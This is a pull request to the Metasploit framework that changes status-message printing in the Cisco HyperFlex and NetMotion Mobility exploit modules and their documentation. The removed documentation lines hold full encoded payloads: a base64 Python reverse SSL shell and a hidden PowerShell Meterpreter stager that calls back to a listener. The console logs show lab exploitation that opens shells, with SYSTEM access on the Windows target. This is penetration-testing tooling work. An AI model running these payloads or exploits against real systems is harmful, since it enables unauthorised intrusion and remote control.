### PR TITLE
Backport print changes to recent modules

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.md
@@ -63,10 +63,8 @@ msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run
 [*] Started reverse SSL handler on 172.16.57.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Storfs ASUP servlet detected.
-[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
-[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE3Mi4xNi41Ny4xJyw0NDQ0KSkKcz1zc2wud3JhcF9zb2NrZXQoc28pCmx4PUZhbHNlCndoaWxlIG5vdCBseDoKCWRhdGE9cy5yZWN2KDEwMjQpCglpZiBsZW4oZGF0YSk9PTA6CgkJbHggPSBUcnVlCglwcm9jPXN1YnByb2Nlc3MuUG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsc3RkZXJyPXN1YnByb2Nlc3MuUElQRSxzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCglzdGRvdXRfdmFsdWU9cHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpCglzLnNlbmQoc3Rkb3V0X3ZhbHVlKQo=')[0]))"
-[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55088) at 2021-07-06 22:24:32 -0500
-[!] Command execution timed out
+[*] Executing cmd/unix/reverse_python_ssl (Unix Command)
+[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55474) at 2021-07-08 21:24:26 -0500
 
 id
 uid=111(tomcat7) gid=114(tomcat7) groups=114(tomcat7),42(shadow)

--- a/documentation/modules/exploit/windows/http/netmotion_mobility_mvcutil_deserialization.md
+++ b/documentation/modules/exploit/windows/http/netmotion_mobility_mvcutil_deserialization.md
@@ -69,29 +69,23 @@ Exploit target:
    2   PowerShell Stager
 
 
-msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set rhosts 192.168.123.135
-rhosts => 192.168.123.135
-msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set lhost 192.168.123.1
-lhost => 192.168.123.1
-msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set verbose true
-verbose => true
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set rhosts 172.16.57.3
+rhosts => 172.16.57.3
+msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set lhost 172.16.57.1
+lhost => 172.16.57.1
 msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > run
 
-[*] Started HTTPS reverse handler on https://192.168.123.1:8443
-[*] Executing automatic check (disable AutoCheck to override)
+[*] Started HTTPS reverse handler on https://172.16.57.1:8443
+[*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. NetMotion Mobility 12.01.09045 is unpatched.
-[*] Selected windows/x64/meterpreter/reverse_https (PowerShell Stager)
-[*] Powershell command length: 2886
-[*] Triggering deserialization
-[*] Executing command: set Path=%Path%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0&&powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
-[+] Successfully triggered deserialization
-[*] https://192.168.123.1:8443 handling request from 192.168.123.135; (UUID: d1ojcl7r) Staging x64 payload (201308 bytes) ...
-[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 127.0.0.1) at 2021-05-15 18:43:47 -0500
+[*] Executing windows/x64/meterpreter/reverse_https (PowerShell Stager)
+[*] https://172.16.57.1:8443 handling request from 172.16.57.3; (UUID: s66tryd9) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (172.16.57.1:8443 -> 127.0.0.1) at 2021-07-08 21:25:22 -0500
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
-Computer        : WIN-FPMD9TVAMRK
+Computer        : WIN-MIUE6PRQH9F
 OS              : Windows 2016+ (10.0 Build 14393).
 Architecture    : x64
 System Language : en_US

--- a/modules/exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.rb
+++ b/modules/exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Selected #{payload_instance.refname} (#{target.name})")
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']
     when :unix_cmd
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    print_status("Executing command: #{cmd}")
+    vprint_status(cmd)
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -119,16 +119,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     }, datastore['CmdExecTimeout'])
 
-    unless res
-      print_warning('Command execution timed out')
-      return
-    end
+    return unless res
 
-    unless res.code == 200
-      fail_with(Failure::PayloadFailed, 'Failed to execute command')
-    end
-
-    print_good('Successfully executed command')
+    fail_with(Failure::PayloadFailed, cmd) unless res.code == 200
   end
 
 end

--- a/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb
+++ b/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Selected #{payload_instance.refname} (#{target.name})")
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']
     when :win_cmd
@@ -159,8 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
       '&&'
     )
 
-    print_status('Triggering deserialization')
-    vprint_status("Executing command: #{cmd}")
+    vprint_status(cmd)
 
     res = send_request_cgi(
       'method' => 'POST',
@@ -171,10 +170,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing
-      fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')
+      fail_with(Failure::PayloadFailed, cmd)
     end
-
-    print_good('Successfully triggered deserialization')
   end
 
   def go_go_gadget(cmd)


### PR DESCRIPTION
Retested, of course. New output is more consistent with/without `VERBOSE` set.

```
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run

[*] Started reverse SSL handler on 172.16.57.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Storfs ASUP servlet detected.
[*] Executing cmd/unix/reverse_python_ssl (Unix Command)
[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.4:55474) at 2021-07-08 21:24:26 -0500
```

```
msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > run

[*] Started HTTPS reverse handler on https://172.16.57.1:8443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. NetMotion Mobility 12.01.09045 is unpatched.
[*] Executing windows/x64/meterpreter/reverse_https (PowerShell Stager)
[*] https://172.16.57.1:8443 handling request from 172.16.57.3; (UUID: s66tryd9) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (172.16.57.1:8443 -> 127.0.0.1) at 2021-07-08 21:25:22 -0500
```

Updates #15186, #15281, and #15399. For #15383.